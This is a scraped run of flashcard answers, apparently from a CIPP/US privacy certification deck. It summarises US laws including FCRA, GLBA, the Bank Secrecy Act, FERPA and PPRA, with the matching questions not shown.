Certify to the CRA that the above steps have been followed, that the information being obtained will not be used in violation of any federal or state equal opportunity law or regulation, and that, if any adverse action is to be taken based on the consumer report, a copy of the report and a summary of the consumer’s rights will be provided to the consumer.
Before taking an adverse action, provide a copy of the report to the consumer as well as the summary of the consumer’s rights. (The user should receive this summary from the CRA.) An adverse action notice should be sent after the adverse action is taken

Answer 302

A

(1) the employer or its agent complies with the procedures set forth in the act,
(2) no credit information is used and
(3) a summary describing the nature and scope of the inquiry is provided to the employee if an adverse action is taken based on the investigation

Answer 303

A

character, general reputation, personal characteristics and mode of living, which is obtained through personal interviews by an entity or person that is a CRA

Answer 304

A

The consumer must be informed that an investigative consumer report may be obtained.
The disclosure must be in writing and must be mailed or otherwise delivered to the consumer some time before but not later than three days after the date on which the report was first requested.
The disclosure must include a statement informing the consumer of his or her right to request additional disclosures of the nature and scope of the investigation, and the summary of consumer rights required by the FCRA. The summary of consumer rights will be provided by the CRA that conducts the investigation.
The user must certify to the CRA that the required disclosures have been made and that the user will make the necessary disclosure to the consumer.
Upon written request of a consumer made within a reasonable period of time after the required disclosures, the user must make a complete disclosure of the nature and scope of “the investigation.
The nature and scope disclosure must be made in a written statement that is mailed or otherwise delivered to the consumer no later than 5 days after the date on which the request was received from the consumer or the report was first requested, whichever is later

Answer 305

A

FCRA limits the use of medical information obtained from CRAs, other than payment information that appears in a coded form and does not identify the medical provider.

Answer 306

A

the consumer must provide consent to the user of the report, or the information must be coded

Answer 307

A

the consumer must provide specific written consent and the medical information must be relevant

Answer 308

A

necessary to carry out the purpose for which the information was disclosed, or as permitted by statute, regulation or order

Answer 309

A

Practice where FCRA permits creditors and insurers to obtain limited consumer report information for use in connection with firm unsolicited offers of credit or insurance, under certain circumstances and conditions. This typically involves obtaining from a CRA a list of consumers who meet certain preestablished criteria

Answer 310

A

(1) before the offer is made, establish the criteria that will be relied upon to make the offer and to grant credit or insurance and (2) maintain such criteria on file for a three-year period beginning on the date on which the offer is made to each consumer

Answer 311

A

Info contained in a consumer’s CRA file was used in connection with the transaction.
The consumer received the offer because he or she satisfied the criteria for creditworthiness or insurability used to screen for the offer.
Credit or insurance may not be extended if, after the consumer responds, it is determined that the consumer does not meet the criteria used for screening or any applicable criteria bearing on creditworthiness or insurability, or the consumer does not furnish required collateral.
The consumer may prohibit the use of info in his or her file in connection with future prescreened offers of credit or insurance by contacting the notification system established by the CRA that provided the report.
The statement must include the address and toll-free telephone number of the appropriate notification system.

Answer 312

A

Under FACTA, stricter state laws are preempted in most areas, although states retain some powers to enact laws addressing identity theft

Answer 313

A

Required truncation of credit and debit card numbers, so that receipts do not reveal the full credit or debit card number.
Gave consumers new rights to an explanation of their credit scores.
Gave individuals the right to request a free annual credit report from each of the three national consumer credit agencies—Equifax, Experian and TransUnion.
Along with other identity theft protections, FACTA required regulators to promulgate a Disposal Rule and a Red Flags Rule

Answer 314

A

Requires any individual or entity that uses a consumer report, or information derived from a consumer report, for a business purpose to dispose of that consumer information in a way that prevents unauthorized access and misuse of the data.

Answer 315

A

Consumer reports can be electronic or written

Answer 316

A

The rule applies to both small and large organizations, including consumer reporting agencies, lenders, employers, insurers, landlords, car dealers, attorneys, debt collectors and government agencies

Answer 317

A

Disposal includes any discarding, abandonment, donation, sale or transfer of information

Answer 318

A

The standard for disposal requires practices that are “reasonable” to protect against unauthorized access to or use of the consumer data

Answer 319

A

Burn, pulverize or shred papers containing consumer report information so that the information cannot be read or reconstructed
Destroy or erase electronic files or media containing consumer report information so that the information cannot be read or reconstructed
Conduct due diligence and hire a document destruction contractor to dispose of material specifically identified as consumer report information consistent with the rule

Answer 320

A

Enforcement of the Disposal Rule is by the FTC, the federal banking regulators and the CFPB

Answer 321

A

Violators may face civil liability as well as federal and state enforcement actions.

Answer 322

A

The FTC, together with federal banking agencies, authored the Red Flags Rule

Answer 323

A

Specifically, the rule applies to financial institutions and creditors. “Financial institution” is defined as all banks, savings and loan associations and credit unions. It also includes all other entities that hold a “transaction account” belonging to a consumer

Answer 324

A

The rule requires certain financial entities to develop and implement written identity theft detection programs that can identify and respond to the “red flags” that signal identity theft

Answer 325

A

Was passed in response to concern that the definition of creditor extended to implicate unintended entities, such as attorneys and health providers, simply because they allow customers to pay their bills after the time of service.
The clarification narrows the previously broad definition of creditor, as well as the circumstances under which they are covered by the rule
Eliminates entities that extend credit only “for expenses incidental to a service.

Answer 326

A

The rule still applies to entities that, regularly and in the course of business:

Obtain or use consumer reports in connection with a credit transaction
Furnish information to consumer reporting agencies in connection with a credit transaction
Advance funds to or on behalf of someone, except for expenses incidental to a service provided by the creditor to that person

The new law also authorizes regulations that apply the rule to businesses whose accounts should be “subject to a reasonably foreseeable risk of identity theft.”

Answer 327

A

Title V of the Financial Services Modernization Act of 1999 led to the promulgation of both a Privacy Rule and a Safeguards Rule, aka GLBA

Answer 328

A

These privacy provisions were spurred by enforcement actions against major banks for controversial data practices. Prior to GLBA’s passage, a number of leading financial institutions were found to have shared detailed customer information, including account numbers and other highly sensitive data, with telemarketing firms. Subsequently, the firms used the account numbers to charge customers for unsolicited services

Answer 329

A

The Minnesota attorney general’s office brought suit in 1999, as Congress was considering GLBA. The suit resulted in a $3 million settlement for allegations that the bank had sent detailed customer information to the telemarketing firm, including account numbers and related information that enabled the marketer to directly withdraw funds from the customer account. The allegations also stated that the marketing firm was using a “negative option,” where customers were charged automatically for services unless they later sent a specific request not to be billed.
The U.S. Bancorp/MemberWorks case focused popular and regulatory attention on the prevalence of data-sharing relationships between banks and third-party marketers

Answer 330

A

A group of 25 attorneys general brought additional actions against major financial institutions in an attempt to address these practices. Congress responded to these events by including significant privacy and security protections for consumers in GLBA and mandating further rulemaking on privacy and security by the FTC, federal banking regulators and state insurance regulators. Financial institutions were required to substantially comply with GLBA’s requirements in 2001

Answer 331

A

Eliminated legal barriers to affiliations among banks, securities firms, insurance companies and other financial services companies
Financial institutions are required to:
(1) Store personal financial information in a secure manner
(2) Provide notice of their policies regarding the sharing of personal financial information
(3) Provide consumers with the choice to opt-out of sharing some personal financial information
requires financial institutions to protect consumers’ nonpublic personal information under privacy rules that were promulgated originally by the FTC and FI regulators

Answer 332

A

GLBA applies to “financial institutions,” which are defined broadly as any U.S. companies that are “significantly engaged” in financial activities. Financial institutions include entities such as banks, insurance providers, securities firms, payment settlement services, check-cashing services, credit counselors and mortgage lenders, among others.

Answer 333

A

“nonpublic personal information,” defined as “personally identifiable financial information (i) provided by a consumer to a financial institution, (ii) resulting from a transaction or service performed for the consumer, or (iii) otherwise obtained by the financial institution.”

Excluded from the definition are publicly available information and any consumer list that is derived without using personally identifiable financial information

Answer 334

A

Banking and related financial “institutions that fail to comply with GLBA requirements can be subject to substantial penalties under the Financial Institution Reform, Recovery and Enforcement Act (FIRREA). FIRREA penalties range from up to $5,500 for violations of laws and regulations, to a maximum of $27,500 if violations are unsafe, unsound or reckless, to as much as $1.1 million for “knowing” violations.”

Answer 335

A

institutions that fail to comply with GLBA requirements can be subject to substantial penalties under the Financial Institution Reform, Recovery and Enforcement Act (FIRREA). FIRREA penalties range from up to $5,500 for violations of laws and regulations, to a maximum of $27,500 if violations are unsafe, unsound or reckless, to as much as $1.1 million for “knowing” violations

Answer 336

A

Stricter state laws are not preempted under GLBA. The validity of stricter state laws, however, can be subject to challenge because there is limited preemption under FCRA, so courts would need to determine which federal financial privacy statute governs for a particular state law

Answer 337

A

No. Although there is no private right of action under GLBA, failure to comply with certain notice requirements may be considered a deceptive trade practice by state and federal authorities. Some states also have private rights of action for this type of violation.

Answer 338

A

GLBA’s privacy protections generally apply to “consumers,” or individuals who obtain financial products or services from a financial institution to be used primarily for personal, family or household purposes. Many of the act’s requirements relate to the subset of consumers who are also “customers”—consumers with whom the organization has an ongoing relationship. Financial services companies that do not have such “consumer customers” are not subject to some of GLBA’s requirements, such as those related to notice.

Answer 339

A

Prepare and provide to customers clear and conspicuous notice of the financial institution’s information-sharing policies and practices. These notices must be provided when a customer relationship is established and annually thereafter.
Clearly provide customers the right to opt out of having their nonpublic personal information shared with nonaffiliated third parties (subject to significant exceptions, including for joint marketing and processing of consumer transactions)
Refrain from disclosing to any nonaffiliated third-party marketer, other than a consumer reporting agency, an account number or similar form of access code to a consumer’s credit card, deposit or transaction account
Comply with regulatory standards established by certain government authorities to protect the security and confidentiality of customer records and information, and protect against security threats and unauthorized access to or certain uses of such records or information

Answer 340

A

The privacy notice itself must be a clear, conspicuous and accurate statement of the company’s privacy practices and must include the following:

What information the financial institution collects about its consumers and customers
With whom it shares the information
How it protects or safeguards the information
An explanation of how a consumer may opt out of having his or her information shared through a reasonable opt-out process

Answer 341

A

No. GLBA prohibits financial institutions from disclosing consumer account numbers to nonaffiliated companies for purposes of telemarketing and direct mail marketing (including through email), even if the consumer has not opted out of sharing the information for marketing purposes. Also, a financial institution must ensure that service providers will not use provided consumer data for anything other than the intended purpose

Answer 342

A

A financial institution shares information with outside companies that provide essential services like data processing or servicing accounts
The disclosure is legally required
A financial institution shares customer data with outside service providers that market the financial company’s products or services

Answer 343

A

GLBA requires financial institutions to maintain security controls to protect the confidentiality and integrity of personal consumer information, including both electronic and paper records

Answer 344

A

Develop and implement a comprehensive “information security program,” which is defined as a program that contains “administrative, technical and physical safeguards” to protect the security, confidentiality and integrity of customer information

Answer 345

A

Like the GLBA Privacy Rule, the Safeguards Rule distinguishes the concepts of security, confidentiality and integrity, but suggests that all three concepts are integral to a complete understanding of security

Answer 346

A

includes program definition, management of workforce risks, employee training and vendor oversight

Answer 347

A

covers computer systems, networks and applications in addition to access controls and encryption

Answer 348

A

includes facilities, environmental safeguards, business continuity and disaster recovery

Answer 349

A

(1) ensure the security and confidentiality of customer information,
(2) protect against any anticipated threats or hazards to the security or integrity of the information and
(3) protect against unauthorized access to or use of the information that could result in substantial harm or inconvenience to any customer

Answer 350

A

Designate an employee to coordinate the safeguards
Identify and assess the risks to customer information in each relevant area of the company’s operation and evaluate the effectiveness of the current safeguards for controlling those risks
Design and implement a safeguard program and regularly monitor and test it
Select appropriate service providers and enter into agreements with them to implement safeguards
Evaluate and adjust the program in light of relevant circumstances, including changes in business arrangements or operations, or the results of testing and monitoring of safeguards

Answer 351

A

Aka California Financial Information Privacy Act, expands the financial privacy protections afforded under GLBA
SB-1 increases the disclosure requirements of financial institutions and grants consumers increased rights with regard to the sharing of information

Answer 352

A

Violation of SB-1 in cases of negligent noncompliance can be punished with statutory damages of $2,500 per consumer, up to a cap of $500,000 per occurrence. In cases of willful noncompliance, there is no $500,000 damage cap

Answer 353

A

It has both

Answer 354

A

Written opt-in consent is required for a financial institution to share personal information with nonaffiliated third parties. Opt-in provisions must be presented on a form titled “Important Privacy Choices for Consumers” and be written in simple English

Answer 355

A

SB-1 grants consumers the ability to opt out of information sharing between their financial institutions and affiliates not in the same line of business

Answer 356

A

A financial institution does not, however, need to obtain consumer consent in order to share nonmedical information with its wholly owned subsidiaries engaged in the same line of business—insurance, banking or securities—if they are regulated by the same functional regulator

Answer 357

A

In response to the financial crisis that became acute in 2008, Congress enacted the Dodd-Frank Wall Street Reform and Consumer Protection Act, which was signed into law in June 2010

Answer 358

A

Title X of the act created the CFPB as an independent bureau within the Federal Reserve

Answer 359

A

The CFPB oversees the relationship between consumers and providers of financial products and services

Answer 360

A

FCRA, GLBA and Fair Debt Collection Practices Act

Answer 361

A

The CFPB also can now bring enforcement actions for unfairness and deception
The CFPB has a new power to enforce against “abusive acts and practices”

Answer 362

A

Materially interferes with the ability of a consumer to understand a term or condition of a consumer financial product or service or
Takes unreasonable advantage of—
(1) A lack of understanding on the part of the consumer of the material risks, costs, or conditions of the product or service;
(2) The inability of the consumer to protect its interests in selecting or using a consumer financial product or service; or
(3) The reasonable reliance by the consumer on a covered person to act in the interests of the consumer

Answer 363

A

Civil penalties vary from $5,526 per day for federal consumer privacy law violations to $27,631 per day for reckless violations and $1,105,241 for knowing violations. Further, state attorneys general are also authorized to bring civil actions in enforcement of the law or regulations

Answer 364

A

U.S. anti-money-laundering laws stem from the Bank Secrecy Act of 1970, which targeted organized crime groups and others who used large cash transactions. The laws became stricter as part of the USA PATRIOT Act of 2001, with its focus on antiterrorism efforts.

Answer 365

A

The fundamental goal of anti-money-laundering laws is to “follow the money”

Answer 366

A

Aka Currency and Foreign Transaction Reporting Act of 1970, authorizes the U.S. treasury secretary to issue regulations that impose extensive record-keeping and reporting requirements on financial institutions

Answer 367

A

Specifically, financial institutions must keep records and file reports on certain financial transactions, including currency transactions in excess of $10,000, which may be relevant to criminal, tax or regulatory proceedings.

Answer 368

A

The BSA applies to banks, securities brokers and dealers, money services businesses, telegraph companies, casinos, card clubs, and other entities subject to supervision by any state or federal bank supervisory authority. The scope of covered institutions has expanded over time to address the problem that criminals have an incentive to exploit whatever institutions are not already covered by the anti-money-laundering laws

Answer 369

A

The BSA generally requires currency transactions of $10,000 or more to be reported to the IRS per the regulations, using a Currency Transaction Report, Form 4789

Answer 370

A

The BSA regulations cover purchases of bank checks, drafts, cashier’s checks, money orders or traveler’s checks for $3,000 or more in currency

Answer 371

A

Certain funds transfers are exempted from the regulation, however, including funds transfers governed by the Electronic Funds Transfer Act and those made through an automated clearinghouse, ATM or point-of-sale system

Answer 372

A

Financial institutions are required to maintain records of all extensions of credit in excess of $10,000, but this does not include credit secured by real property. Not all records must be maintained—only those with a “high degree of usefulness”

Records that are maintained must include the borrower’s name and address, credit amount, purpose of credit and date of credit

Answer 373

A

Records must be maintained for 5 years

Answer 374

A

A financial institution must keep the depositor’s taxpayer identification number, signature cards, and checks exceeding $100 that are drawn or issued and payable by the bank

Answer 375

A

With regard to certificates of deposit, the financial institution must obtain the customer name and address, a description of the CD and the date of the transaction

Answer 376

A

For wire transfers or direct deposits, a financial institution must maintain all deposit slips or credit tickets for transactions exceeding $100

Answer 377

A

A SAR must be filed with the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) in the following circumstances:

(1) when a financial institution suspects that an insider is committing (or aiding the commission of) a crime, regardless of dollar amount;
(2) when the entity detects a possible crime involving $5,000 or more and has a substantial basis for identifying a suspect;
(3) when the entity detects a possible crime involving $25,000 or more (even if it has no substantial basis for identifying a suspect) and (4) when the entity suspects currency transactions aggregating $5,000 or more that involve potential money laundering or a violation of the act.

Answer 378

A

Civil penalties, including fines up to the greater of $25,000 or the amount of the transaction (up to a $100,000 maximum) as well as penalties for negligence ($500 per violation); additional penalties up to $5,000 per day for failure to comply with regulations; penalties of up to $25,000 per day for failure to comply with the information-sharing requirements of the USA PATRIOT Act; and penalties up to $1 million against financial institutions that fail to comply with due diligence requirements

Answer 379

A

Criminal penalties include up to a $100,000 fine and/or one-year imprisonment and up to a $10,000 fine and/or five-year imprisonment

Answer 380

A

As part of the USA PATRIOT Act, the International Money Laundering Abatement and Anti-Terrorist Financing Act of 2001 expanded the reach of the BSA and made other significant changes to U.S. anti-money-laundering laws

Answer 381

A

The act gave the U.S. treasury secretary the ability to promulgate broad rules to implement modified Know Your Customer requirements and to otherwise deter money laundering

Answer 382

A

For covered financial services companies, the major USA PATRIOT Act compliance issues can be grouped into the following categories:

(1) Information-sharing regulations and participation in the cooperative efforts to deter money laundering, as required by Section 314
(2) Know Your Customer rules, including the identification of beneficial owners of accounts—procedures required by Section 326
(3) “Development and implementation of formal money-laundering programs as required by Section 352
(4) Bank Secrecy Act expansions, including new reporting and record-keeping requirements for different industries (such as broker-dealers) and currency transactions

Answer 383

A

Seeks to target non-compliance with U.S. tax laws for U.S. taxpayers with foreign accounts
To deter tax evasion and require greater withholding of income to these taxpayers, FATCA requires more detailed “know your customer” documentation for both domestic and foreign financial institutions

Answer 384

A

Letting customers know the type of authentication methods the financial institution has in place
Informing customers of the dangers of using public Wi-Fi connections
Empowering customers with information on mobile antivirus and malware detection software
Creating a mobile privacy policy and having it certified by a reputable third party
Fostering trust with customers by enabling them to decide which data to share and allowing them to opt out of mobile ad targeting

Answer 385

A

Aka Buckley Amendment

- Provides students with control over disclosure and access to their education records

Answer 386

A

The statute generally prevents schools from divulging education record information, such as grades and behavior, to parties other than the student, without that student’s consent

Answer 387

A

FERPA includes major aspects of Fair Information Practice Principles, including:

(1) notice,
(2) consent,
(3) access and correction,
(4) security
(5) accountability

Answer 388

A

FERPA applies to all educational institutions that receive federal funding

Such funding exists for virtually all public and most private schools, especially at the postsecondary level

Answer 389

A

Control the disclosure of their education records to others
Review and seek amendment of their own education records
Receive annual notice of their rights under FERPA
File complaints with the U.S. Department of Education

Answer 390

A

FERPA defines it to include all records that are directly related to the student and maintained by the school or by a party on behalf of the school. This extends beyond grades and other academic records to include financial aid records, disciplinary records and others related to the student
FERPA defines “record” as “any information recorded in a way, not including, but not limited to, handwriting, print, computer media, video or audio tape, film, microfilm, and microfiche.” All electronic records and emails are covered by the term “computer media”

Answer 391

A

Campus police records created and maintained by school campus police for law enforcement purposes
Employment records, when the employee is not a student at the university
Treatment records or health records, subject to several requirements
Applicant records of those who are not enrolled in the university
Alumni records created by a school after the individual is no longer a student
Grades on peer-graded papers, before they are collected and recorded by a faculty member or other university representative

Answer 392

A

The information is not “personally identifiable”
The information is “directory information” whose release the student has not blocked
Consent has been provided by: (1) the parent, or (2) the student once the rights transfer to the student when he or she reaches the age of 18 or attends only a postsecondary institution
The disclosure is made to (1) the parent or (2) the student himself or herself once the rights transfer to the student when he or she reaches the age of 18 or attends only a postsecondary institution
A statutory exception applies, such as for health or safety purposes

Answer 393

A

The student’s name
The name of the student’s parent or other family members
The student or student’s family’s address
Personal identifiers such as the Social Security number or student number
Other identifiers, such as date of birth
Other information that, alone or in combination, can be linked to a student and would allow the student to be identified with reasonable certainty
Information requested by a person whom the school reasonably believes knows the identity of the student to which the education record is linked

Answer 394

A

“Directory information” is broadly defined by FERPA to include information that would not generally be considered an invasion of privacy or harmful if disclosed
FERPA does not designate specific information types as directory information for every educational institution but rather allows individual educational institutions to create their own definitions based on lists of examples provided in the statute and rules laid down by the Department of Education.

Answer 395

A

name, date of birth, address, email address, telephone number, field of study, and honors received

Answer 396

A

. . . . students with an opportunity to opt out, or block the release of their directory information. Students cannot use this opt-out to prevent the release of information that falls under a FERPA exception

Answer 397

A

The regulations promulgated under FERPA specifically exclude the use of Social Security numbers or student identification numbers as directory information. An educational institution, however, may use student identification numbers as directory information if that number cannot be used to access education records without another factor known only by the authorized user.

Answer 398

A

Valid student consent to disclosure must be signed (by hand or electronically), dated and written. It must also identify:

(1) The record(s) to be disclosed
(2) The purpose of disclosure
(3) To whom the disclosure is being made

Answer 399

A

Disclosure to school officials who have determined a “legitimate educational interest” in the records
Disclosure to educational institutions in which a student seeks or intends to enroll, or is currently enrolled, when the disclosure is for a purpose related to the student’s enrollment or transfer.
Disclosure in connection w/ financial aid that the student has received or for which the student will apply, when the purpose of the disclosure is to determine the student’s eligibility for aid or conditions to or amount of financial aid.
Disclosure to orgs doing research studies for, or on behalf of, educational institutions for the purpose of developing predictive tests, administering student aid programs or improving school instruction.
Disclosure to accrediting organizations to fulfill accrediting duties.
Disclosure to the alleged victim of a forcible or nonforcible sex offense.
Disclosure of info related to sex offenders and others when the info is provided to the school under federal registration and disclosure requirements.
Disclosure to a person or entity that is verified as the party that provided or created that record.
Disclosure to law enforcement or otherwise to comply with a judicial order or subpoena.
Disclosure to appropriate parties in connection with a “health or safety emergency,” if knowledge of this information is necessary to protect the health or safety of the student or others

Answer 400

A

A legitimate educational interest exists if the record is relevant and necessary to the school official’s responsibilities
This group includes school employees and board members as well as 3rd-party vendors (1) to whom the school outsources duties and (2) who are under the direct control of the school regarding use and maintenance of the record.
These 3rd parties are not permitted to disclose record info to any other party without consent, and cannot use the record for any other purpose than for which the disclosure was made

Answer 401

A

if a student transfers high schools, the second school can disclose a student’s transcript to the original school to verify its authenticity

Answer 402

A

The threat of harm must be “articulable and significant,” and the school can take the totality of the circumstances into account in making this determination. Information can be disclosed to any individual with the ability to assist in the situation—this includes parents, law enforcement, school officials, spouse or partner and other educational institutions, among others

Answer 403

A

A school is safe from federal scrutiny of its health and safety emergency determination as long as, based on the information available at the time, there is rational basis for the determination

Answer 404

A

FERPA provides students with the right to access and review their education records

Answer 405

A

Once a student has issued a request, the educational institution must provide access to the records within 45 days of that request.
It also must respond to reasonable requests from students for explanations of the records

Answer 406

A

As with other disclosures to third parties, the educational institution must use reasonable measures to verify the identity of the student making the record request

Answer 407

A

Students can request corrections to their education records if they believe the records to be inaccurate, misleading or in violation of their privacy.
This access is intended to allow students to address incorrect records and is not for other purposes
If the request is granted, the records must be corrected within a reasonable time

Answer 408

A

The student has a right to request a hearing

Answer 409

A

The student must receive prior and reasonable notice of the time, place and date.
It must be held within a reasonable time after the request is made.
It must be conducted by a party without a direct interest in the outcome
The student must be afforded a “full and fair” opportunity to present his or her case, with or without assistance or representation.
The decision must be based on the evidence presented at the hearing, delivered, in writing, within a reasonable amount of time after the hearing, and must contain a summary and explanation for the decision

Answer 410

A

Congress responded to concerns about the collection and disclosure of student information for commercial purposes by amending FERPA in 1978 with the Protection of Pupil Rights Amendment (PPRA)

Answer 411

A

PPRA provides certain rights to parents of minors with regard to the collection of sensitive information from students through surveys.

Answer 412

A

Political affiliations
Mental and psychological problems potentially embarrassing to the student and his/her family
Sex behavior and attitudes
Illegal, antisocial, self-incriminating and demeaning behavior
Critical appraisals of other individuals with whom respondents have close family relationships
Legally recognized privileged or analogous relationships, such as those of lawyers, physicians and ministers
Religious practices, affiliations or beliefs of the student or student’s parent
Income (other than that required by law to determine eligibility for participation in a program or for receiving financial assistance under such program)

Answer 413

A

The No Child Left Behind Act of 2001 broadened the PPRA to limit the collection and disclosure of student survey information

Answer 414

A

Enact policies regarding the collection, disclosure or use of personal information about students for commercial purposes
Allow parents to access and inspect surveys and other commercial instruments before they are administered to students
Provide advance notice to parents about the approximate date when these activities are scheduled
Provide parents the right to opt-out of surveys or other sharing of student information for commercial purposes

Answer 415

A

PPRA requirements apply to all elementary and secondary schools that receive federal funding; the statute, however, does not apply to postsecondary schools

Answer 416

A

If the school receives federal funding&raquo_space; the health records are subject to FERPA—and not HIPAA—where a public elementary or secondary school provides a nurse for student health issues
By contrast, FERPA does not apply to private elementary or secondary schools that do not receive federal funding. Health records maintained by one of these private schools are thus subject to the HIPAA Privacy Rule if the school qualifies as a “covered entity” under the federal law

Answer 417

A

A college or university with a healthcare clinic that treats only students is generally subject to the confidentiality requirements of FERPA relating to the student’s health-care records
Both FERPA and the HIPAA Privacy Rule typically apply to the college or university healthcare center that treats both students and nonstudents—such as faculty and staff
FERPA applies to the student health records, and the HIPAA Privacy Rule applies to the nonstudent health records

Answer 418

A

In 2014, students in California who used Apps for Education sued Google, accusing the company of scanning millions of emails sent to and received by the students.
The Electronic Privacy Information Center, a nongovernmental organization focused on civil liberties and privacy, asserted that Google’s practice violated FERPA, and advocated for the Department of Education to investigate the company.
Soon after the lawsuit was filed, Google agreed to change its business practices to ensure that the information in the emails could not be used for commercial purposes

Answer 419

A

includes a dozen specific provisions, including a prohibition on selling student personal information and a ban on using information collected in schools for behavioral targeting of advertisements to students

Answer 420

A

Violation of the pledge would make a company subject to enforcement as a deceptive trade practice under Section 5 of the Federal Trade Commission Act

Answer 421

A

At 18, the student is the person in control of rights connected to education records, including grades, rather than the parents. If a student has left high school and is attending only a postsecondary institution, the rights under FERPA are held by the student—regardless of the student’s age

Answer 422

A

Even after the rights under FERPA have transferred to the student, however, a school may disclose to the parents the educational records of the student, without the student’s consent, in the circumstance where the student is a dependent for tax purposes

Answer 423

A

The tort of “intrusion on seclusion” imposes liability on “one who intentionally intrudes, physically or otherwise, upon the solitude or seclusion of another or his private affairs or concerns”

Brainscape's Knowledge GenomeTM

CIPP / US Book Flashcards

Brainscape's Knowledge Genome^TM